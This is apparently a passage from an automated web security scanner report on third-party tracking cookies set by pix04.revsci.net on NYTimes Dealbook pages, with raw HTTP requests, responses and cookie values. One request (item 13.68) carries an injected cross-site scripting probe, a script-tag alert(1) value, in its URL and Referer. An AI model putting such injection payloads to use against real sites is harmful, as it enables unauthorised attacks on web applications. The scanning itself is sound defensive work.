1GdQ8OTCrEhhRyzyvNZgxPi+sGIfcqlCX+ZH3ramk2Uf/PZmGc1Q8bttSBIVkuefEQOgcbng3f6sNAx7yQU6ptBrFV0lWFsni+DR+2TNoyVYy/PfomMhoRWE3RhkSrwqbrC8HWnt9hLUZoJwgb/OIqiE/aG4B+pHzGDO+DAQ0a7J+iO1iXPs5qLi1qftz/gGPh4A/pD2/3JiyXka9hUKr0HSpd+wm8Wv1qupg3niAOmB0pjoq28uVdCjpFmiN4MIut0J9pZHhfDtxy+KxP73TCH6U3bXBe7sQ4CwS1F3pVnjZ3pLEeLv7WQHYg4l1fZGzLxcDS3lE+8Z3RHoqRSavkip/Bb61ySAeBJQO+KWwCsotEEn071ZjedjGtk4aAOZGHowzsys0YsP6EtVagO6FJfqYVoiPEiBb9Ef5IC1My0ROvqfawWQwoo7dACTQYX2OFby8gztz74Bvbi3B1oa0IVaoK/5U+Igna1iMoOiyBpzfLSueq7aJLVbvEli4dMPP55lG1xKRMS2aVqXuCbeuHaWkr9r42/OxrutzW7fCCWiai1wXT0XmJuYelzUD5jl4l9uvlEAz8YrryIjHzHkDJwebYNSw/ztd+VfMKxzoL5qAicMNMLIuBSG60OFj5i6i0DA5YdTjBbTXjwdDVbmJh4Ezo0axTDd9curxTzK+IhAjTyGo2YZxRNSXjegGqwv+Qr82xsbW+rJe/F4cfTgx+bFIR9Sz0nzMFjNtOcDYN5WzgSecm3L7mCM050h0yyL2x7aSlMZRIjMuvwlbkZNFHpfFSjMxQn2MOOFzrEdPiuVE3V4mIaxGInIZg51BY4O4RdKOYHsb+MaCuDtZ0VG3x7zL+P35e73LkCs2m3rBzDSU81OMFovhORyo5Nwjvh9Y1TtVbAidvGEdpK68vHAl8hK/8lFzcubEYMLQLBjAbCN44U+uCheP5oiWI331kvcbhGfBqgt3AhTeF4evqGGOcJiforNZYm71FXHu/wK02nVERH424qwhZxT1UQrDKhXTpx1X/KnlGKsIbQbYMC3GyGlnXbS/60jUCt1TlfhZjqHnWH2P4bcQlvxTF4e5vrqrCdGf5ePFIerJvt6xt8GV5Lq9CpXxmrIu7uXlu41+TH0kueuA3j0UBchgCxXtEq87fzedOPiqjMqlZksaY79loYiiOmLfkWLRkG/ziRnvRt4D358Kljbbk583QPVXhPfuwBjvp4yBjvTuF2lflQNwVbEzOcC8YeTjcONkWAjmGSBPHL/C3/m0sth1Bcj/GSRybQ9uugUGOAgJkdLry803PRIMEYWu6ljIepAkzN5k1QcSPYiIP+lhUEaFQdlLlcbneGRF3RWYnvUNRJ0e/jyway+VXkYmVzkIRjZk/JO4RsDiKHPXpPy4Sn7XN1Y6Tv/3vTxbyUKAUly9zwABR7OHo718d1TvigcjXc+8aUxCN9dQViBY/htT9BEYDGUctJK7SMgEE4FHd+bMN3cKfoGI6HVIC5OijQhmmEU7UDeQ3qc2Zjim+NLebqbcRe6BYcRIn2/t8ZJgnFeg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:13 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.66. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/579814010.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNOE/FLgIMlrE7uk0efC2MxeQiIW9f4qMA3RvoIdAx3izt0WEHmQdVL0j8gwBbwYN+xoekJT0casdPYJmCnQf6nzyeTtOvbH9yibYGuaoKzy1uAlD/7oqW6csKFkxmhZaFl+jQTmZPk9GgPR9KPyda9+JvYBz/YEF3KohORRwuZK9AfFV8ozq0Uxu091hAQBZa9/Uo5+t4x1b1kdwS1q8wH7uVyQVsOiVrGSktCzfSJjwJUPNCskC+TFybfXv0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
rtc_61Wz=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCANLv6T; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/579814010.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEmBLwIQV+kbw/biG3iKgsa+kLk8D0ZkZeJ97Z/AoU7LFBrME41XvQUP/qg8DMnGZ9C924yoDFHB0JPh0+GLgRF8nfUqsG9IpS7I04mBNjPpQxPhVnicg4juBqIHBbyVzgakza9kMFPER9hUo+C303qHidIn2esoGFDfLFaKdyQuehDDUl4/raNV+U2czlEXgK7yGgmfEBZnc1wnbPIMt8S/bLxrtq7e+o2EMiQ0n9f5GuR+E192nuAFLhbgBqWf2xg3; rtc_OkLn=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_OkLn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLgIMlrE7uk0efC2MxeQiIW9f4qMA3RvoIdAx3izt0WEHmQdVL0j8gwBbwYN+xoekJT0casdPYJmCnQf6nzyeTtOvbH9yibYGuaoKzy1uAlD/7oqW6csKFkxmhZaFl+jQTmZPk9GgPR9KPyda9+JvYBz/YEF3KohORRwuZK9AfFV8ozq0Uxu091hAQBZa9/Uo5+t4x1b1kdwS1q8wH7uVyQVsOiVrGSktCzfSJjwJUPNCskC+TFybfXv0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
Set-Cookie: rtc_61Wz=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCANLv6T; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:29:17 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.67. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/590965522.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOEOhLgIQF/Ubw+6yiFgTmgYBdHsoJiWBBGBKsZM+kKb4NfzIzHN3SvzuFM7006496nYKZH0mewDwK4ZCtLhZXv/YmkG2JIDYc5RsuanPlKJnMTbfNOG8YkPsOtQtNuOpcPqOxFvSJgEUWankYFT2Yl9LQnW3TL6UALkyQtEqFGcKcNskrzJcBYSe/+A4gtAzKS/lFfknOREWCvgghmsmmU2RiSJrCml7kKegC4UNNRUpLiLgNEugSSIf9TomIrj+ABg1; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
rtc_D0S9=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/590965522.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Flinkedin-on-track-to-raise-274-million-with-ipo%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNOEPB7nMMVp94u+yf1fTHFbylf3xSUCqJEEpv7LJlsjeftNd84I1oDZUZb5s27D2NJeZFLT6oXpt5CdiNqhnlw6eTql12Ct5+Oz6IeSkY982gI6j53rDQzcuqBf6kPQdewU4q16oSlJFrIakI2hzJAfgXe29x5XkG204nL/YwlM2S9arSbEJumSD5+DO7Yrw4YrZT9Vx1PbHmVtjWc3BhjZkHqNNtsGgFH+DLaC/r8YaJFy/Cfwl8hJitFEs=; rtc_jd7T=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_jd7T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOhLgIQF/Ubw+6yiFgTmgYBdHsoJiWBBGBKsZM+kKb4NfzIzHN3SvzuFM7006496nYKZH0mewDwK4ZCtLhZXv/YmkG2JIDYc5RsuanPlKJnMTbfNOG8YkPsOtQtNuOpcPqOxFvSJgEUWankYFT2Yl9LQnW3TL6UALkyQtEqFGcKcNskrzJcBYSe/+A4gtAzKS/lFfknOREWCvgghmsmmU2RiSJrCml7kKegC4UNNRUpLiLgNEugSSIf9TomIrj+ABg1; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
Set-Cookie: rtc_D0S9=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.68. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/702365539.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2GxmXbnF6FwzLOQutobAqsf/spstzXxlFG6ck3Qo5/sFCwjE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
rtc_0tQm=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/702365539.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F1%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2G1n452bFHxwtTw/RbfPeaybhywI7lpKJyBxqoc6JAgR4scwc; rtc_ct15=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ct15=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2GxmXbnF6FwzLOQutobAqsf/spstzXxlFG6ck3Qo5/sFCwjE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
Set-Cookie: rtc_0tQm=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:47 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

13.69. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/71896167.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5OKmrgd3gbbjWobvkn1IXjnlu1LNJ9d4JolLatzGnQTLW0czBX79HxWvrpYxsDITCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadaV+PrsMX5NHgYvwPC5gr3Yt2y4CuwWsFZGNb3+plg+HE3zp9eW9A0fom4BiGY4s/G+Uwj6jX05Gl0Qb4rT+TEQk0Q7B9QZZ+lu3RJU3VgQGczhMSaKNrfE5RhrcghAxB/dxrxrGWb7yoqjCXYPgAFPnXybJE07o5ZvmunP1yxWgnOTs+Lp191ypAB+cu3wXMeWrEwZKB8YUlyEeFKlYq/5OiFPisDl6Pq7gbgu9ny1a2vN7mnU/D2s/dZDDyJi4vAVUTHNc/6KyEjrKhOqJr02DQ1eIBBo4c8qk5J42uboOq7ZTwHGjle1if9lmnJrWLswxPXzGWSxeYyS+X/wZb7iiVez1yQif50PjUrppERBb2Nwi4ozEc1oqpYkSui73c8ekn0F3f4J7nsue2TMg80ybtwr5GquG4CyNacrQeoG6+zSw2jlwxR63jfJucJVOtpwvNsv3/vCFZA8SlIa/By5Pi1ol/O1t73I6hYCDLAkh5a5gSJN8bOhcV7Cy1pDAdtLXCd14KZ6b49A0HII1WAMGx8NGSr4HBi+OokZjnabBEtrWICoGrQy3BTU7Cn0budshyY1UXCv38UT9DuZGC6wNYCZRxnPGzuYlihI38INQbEBwsTZhQnloZ9pXNVA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
rtc_CFSh=MLvv+TMxZohq566eiyy8UbOz7zLy9mEQ8mXXGp+M0638wei+ulFK2S4Ev1MTpaDGwTDIzNSh73JhXWRrYe1q8VFI53sIxqXkW/IR8MP3tnhAKaxznh1qqAFm9HLpO7XrTCrWfZ6+/4q3mopY7JK9vgopSNiBtjY1I+h5ZnQDjeIrP2A07R9c4B0/DoWwe5F7/GXFDn0wR3gsWe5Qq5jlnKDXjjbnkdKu+htJpPZuJLep5AUgkTOrDExjihOcK97kgalzpQOSfSUS4/gx9SerYzrRKdPFO9t55yvWAbgzIHyykhff5DQhL78XVuYL1wfsxdaECuiEMQY5vckQQU+IhvQM428uAMzMAoERJuBGfPiYT59YaIB4bp23tdJurKwSjkwMl+sxKI9i2IZ9Pgv3U8tWvb/60/pKr28tszeEt5+RVOsJcaJEU605LAAvDzfAEDI0kmPjGJF04Y1QjbKlVB52QdjXEmgu724m1tRiUlzEtaTKKbGdUcnMHK1ziV9YIoCYIZFdgom+TNQFbl2fO5XYDbBqjJbKnsHykg17mRH02eZX77ZGTswDOKBK1nCt6xuQqh/LRq5Hl1m9yEFdWvXBXsYDOdpMkBetHipC28y80uibGdtmuJgf+wl3TLvzKs6D2M6LtdtkpLo9+XTvVeol7TXHiq9F1Ff+YYO7RuQANyEoCoWNIKbOAvaYSKVKhOv9uuQ7fPIrvr0gsC6L9MyiyZ995wnJAnpqFzGlw4SObB/23WVJRA8MDvOFMSgekPzUbT4+u+EPgjmhGhrU2MO/dbWA4RwVSaQJOF7uXREP0QUpBJyrQpZuu06NzBB0pV3Y+BD/wUxSIApbqwD6DfZI6J4AuJ1E4hxF2e/zDQrd2VjQa0lRO9BSXNcJ2NgQKtzUViKoW8tiG82xNCsmOTgVJ/Nc6bFGzkoST//kVGvSf9I19Iz+0L9jUj4O5U1yalooCBe/pbisUcIL5iJ+1u96Jal4hKTdULTeWz4JEbGVrZm3bz7k/nYD0/GZCTsJrS9LXOs+sDO6N8B9MXKUvF90zwR6WTc0IiFhe